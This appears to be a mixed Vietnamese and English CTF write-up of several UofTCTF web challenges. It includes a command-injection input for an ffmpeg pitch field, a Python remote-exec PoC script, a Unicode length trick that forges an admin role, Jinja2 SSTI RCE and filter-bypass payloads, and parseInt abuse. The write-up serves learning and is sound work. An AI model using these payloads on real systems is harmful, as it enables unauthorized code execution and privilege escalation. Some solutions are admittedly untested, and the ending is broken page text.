## UOFTCTF
### Voice change
đề bài : Voice Changer
vul : command injection
When you go to the page you will see
Flow : click to the micro will record voice
Input pitch is fast or slow @@
after submit your voice will receive
///////////////////////////////////////////////////
$ ffmpeg -i "/app/upload/0a8445c0-b561-11ee-b2b7-a532f82fac95.ogg" -y -af "asetrate=44100*1,aresample=44100,atempo=1/1" "/app/output/0a8445c0-b561-11ee-b2b7-a532f82fac95.ogg"
ffmpeg version 6.1 Copyright (c) 2000-2023 the FFmpeg developers
built with gcc 13.2.1 (Alpine 13.2.1_git20231014) 20231014
configuration: --prefix=/usr --disable-librtmp --disable-lzma --disable-static --disable-stripping --enable-avfilter --enable-gpl --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libdav1d --enable-libdrm --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libharfbuzz --enable-libmp3lame --enable-libopenmpt --enable-libopus --enable-libplacebo --enable-libpulse --enable-librav1e --enable-librist --enable-libsoxr --enable-libsrt --enable-libssh --enable-libtheora --enable-libv4l2 --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwebp --enable-libx264 --enable-libx265 --enable-libxcb --enable-libxml2 --enable-libxvid --enable-libzimg --enable-libzmq --enable-lto=auto --enable-lv2 --enable-openssl --enable-pic --enable-postproc --enable-pthreads --enable-shared --enable-vaapi --enable-vdpau --enable-version3 --enable-vulkan --optflags=-O3 --enable-libjxl --enable-libsvtav1 --enable-libvpl
libavutil 58. 29.100 / 58. 29.100
libavcodec 60. 31.102 / 60. 31.102
libavformat 60. 16.100 / 60. 16.100
libavdevice 60. 3.100 / 60. 3.100
libavfilter 9. 12.100 / 9. 12.100
libswscale 7. 5.100 / 7. 5.100
libswresample 5. 0.100 / 5. 0.100
libpostproc 57. 3.100 / 57. 3.100
Input #0, matroska,webm, from '/app/upload/0a8445c0-b561-11ee-b2b7-a532f82fac95.ogg':
Metadata:
encoder : Chrome
Duration: N/A, start: 0.000000, bitrate: N/A
Stream #0:0(eng): Audio: opus, 48000 Hz, mono, fltp (default)
Stream mapping:
Stream #0:0 -> #0:0 (opus (native) -> vorbis (libvorbis))
Press [q] to stop, [?] for help
Output #0, ogg, to '/app/output/0a8445c0-b561-11ee-b2b7-a532f82fac95.ogg':
Metadata:
encoder : Lavf60.16.100
Stream #0:0(eng): Audio: vorbis, 44100 Hz, mono, fltp (default)
Metadata:
encoder : Lavc60.31.102 libvorbis
size= 3kB time=00:00:00.03 bitrate= 742.6kbits/s speed=15.3x
[out#0/ogg @ 0x7f8d02d395c0] video:0kB audio:12kB subtitle:0kB other streams:0kB global headers:3kB muxing overhead: 29.082904%
size= 15kB time=00:00:01.69 bitrate= 73.3kbits/s speed=24.4x
/////////////////////////////////////
- see this page use command to research
GPT :
You can see the pitch will inject to ,atempo=1/1
We use command "1.7 $(ls -lha)" to the pitch value
Observe carefully And we can see the output
View exploit
You can see file secret.txt
Flags : uoftctf{Y0URPitchIS70OH!9H}
### No code
Explain :
flag : uoftctf{r3g3x_3p1c_f41L_XDDD}
POC:
```
import requests,json
cmd=input('Commmand: ')
PL=f"\nstr(exec(\"import os; result=os.popen(\'{cmd}\').read();\"))+result"
print(PL)
r=requests.post(
"https://uoftctf-no-code.chals.io/execute",
data={"code": PL}
)
data=json.loads(r.content.decode())
print(data['output'][4:])
```
### GuestBook
Đây là source code của bài này
```
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>My Guestbook</title>
<script async=false defer=false>
fetch("https://script.google.com/macros/s/AKfycbyMdMLPsRtvXmcQN1V2yR3Zv_HYI1jvVqOCNAZpx7xgXqSflgwrtcveyUaGB8eTZwkM/exec?sheetId=1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ").then(x=>x.json()).then(x=>{
x.slice(x.length-11).forEach(entry =>{
const el = document.createElement("li");
el.innerText = entry.Name + " - " + entry.Message
document.getElementById("entries").appendChild(el)
})
document.getElementById("loading")?.remove();
})
</script>
</head>
<body>
<h1>
Hi! I made this guestbook for my site, please sign it.
</h1>
<iframe name="dummyframe" id="dummyframe" style="display: none;"></iframe>
<h3 style="margin: 0">Last 10 user entries in the guestbook:</h3>
<p id="loading" style="margin: 0">Loading...</p>
<ul id="entries" style="margin: 0">
</ul>
<h3>Sign the guestbook:</h3>
<form method="POST" action="https://script.google.com/macros/s/AKfycbyMdMLPsRtvXmcQN1V2yR3Zv_HYI1jvVqOCNAZpx7xgXqSflgwrtcveyUaGB8eTZwkM/exec?sheetId=1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ">
<input id="name" name="name" type="text" placeholder="Name" required>
<input id="message" name="message" type="text" placeholder="Message" required>
<button type="submit">Send</button>
</form>
</body>
</html>
```
Nó sẽ gọi một file data theo như mình tìm hiểu thì đây là một file sheet và đoạn
exec?sheetId=1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ
Sẽ là một id riêng biệt cho một sheet
Để xem được nó thì có 2 cách
+ cách 1:
https://docs.google.com/spreadsheets/d/1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ
- sẽ mở một sheet lên và nó chứa flag trong module raw
+ cách 2:
Dùng app script của google hoặc cũng có thể dùng js cũng được
Chạy code và nhận flag:
Flag: uoftctf{@PP 5cRIP7 !5 s0 coOL}
### Jay Bank
Đề bài : Jay's Bank
Tag : trick, mysql, white box
In db.js :
This method converts object to string
Flag exists in config.js
Maintains :
You can see column data contains max 255 chars
Issue : length > 255 cut off the excess data
In routes
IF data.role = admin we can have flag :v
PUT profile
router.put("/profile", jwtAuth, async (req, res) => {
let username = req.user.username;
let existingData = await db.getData(username);
try {
existingData = JSON.parse(existingData);
} catch {
existingData = { role: "user" };
}
let { phone, credit_card, secret_question, secret_answer, current_password } =
req.body;
if (!current_password) {
return res.status(400).json({
success: false,
message: "Missing current password",
});
}
if (
!(
typeof current_password === "string" &&
(await db.verifyPassword(username, current_password))
)
) {
return res
.status(401)
.json({ success: false, message: "Invalid current password" });
}
if (!phone || !credit_card || !secret_question || !secret_answer) {
return res.status(400).json({ success: false, message: "Missing fields" });
}
if (phone.length !== 10 || isNaN(phone)) {
return res
.status(400)
.json({ success: false, message: "Invalid phone number" });
}
if (credit_card.length !== 16 || isNaN(credit_card)) {
return res
.status(400)
.json({ success: false, message: "Invalid credit card number" });
}
if (typeof secret_question !== "string" || secret_question.length > 45) {
return res
.status(400)
.json({ success: false, message: "Invalid secret question" });
}
if (typeof secret_answer !== "string" || secret_answer.length > 45) {
return res
.status(400)
.json({ success: false, message: "Invalid secret answer" });
}
try {
await db.updateData(
username,
db.convert({
phone,
credit_card,
secret_question,
secret_answer,
role: "user",
})
);
return res
.status(200)
.json({ success: true, message: "Successfully updated" });
} catch {
return res
.status(400)
.json({ success: false, message: "Failed to update DB" });
}
});
check secret_answer.length > 45
Remember to unicode "İİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİ"
Length will > 45
ToLOwerCase() will length > 255 and role: "user", will be cut
payload = {
"phone": "1234567890",
"credit_card": "1234567890987654",
"secret_question": "İİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİ",
"secret_answer": 'İİİİİİİİİİİİİİİİİİİİİİİİ","role":"admin"}',
"current_password": account['password']
}
Flag : co lam thi moi co an
### MyFirstApp
- Start this challenge i know this is ssti vulnerability but i sit to bypass regex
- I have thought about it in jwt but if I don't do it, it won't work
- Suggestions from the guys in the club i solver this challenge :
- Brute-force key, we have "torontobluejays"
- Let change username to RCE:
- Use payload jinja2(Python)
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
- Malicious stuff: ["'", '_', 'os', 'popen', 'global']
{{()|attr((request|string).17~(request|string).18~(request|string).19~(request|string).20~(request|string).21~(request|string).22~(request|string).23~(request|string).24~(request|string).25)}}
- RCE success you you will have flag
- ý tưởng là từ đó mình có thể nối các chuỗi
Flags: co lam thi moi bài này xong giải nen mình chưa test lại mà luồng đúng rồi nha :#
### The Varsity
đề bài : The Varsity
vul : parseInt vul in javascript
View source have main you can get the flag
You must show item 10 to view it
Main function
Firstly, verify token
Firewall 1:
Get issue from your from and check issue must > 0
Check if subscription !== "subscription" && issue > 9
You understand if all condition are true and subscription !== "subscription" you cant't control it so you can control issue
After that, parseInt(issue)
Verify issue is number or issue > articles.length - 1
Solution 1:
+ You can search parseInt in google to understand it
+If you control issue = "9+5"; issue > 9 and parseInt(issue) is Number
And so we get flag : : uoftctf{w31rd_b3h4v10r_0f_parseInt()!}
+If you control issue = "9 years"; issue > 9 and parseInt(issue) is Number
```
parseInt("10"); => 10
parseInt("10.00"); => 10
parseInt("10.33"); => 10
parseInt("34 45 66"); => 34
parseInt(" 60 "); => 60
parseInt("40 years"); => 40
parseInt("He was 40"); => NaN
```
Flag : trong anh trenoftCTF](https://)
Google Drive
Gist
Clipboard
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
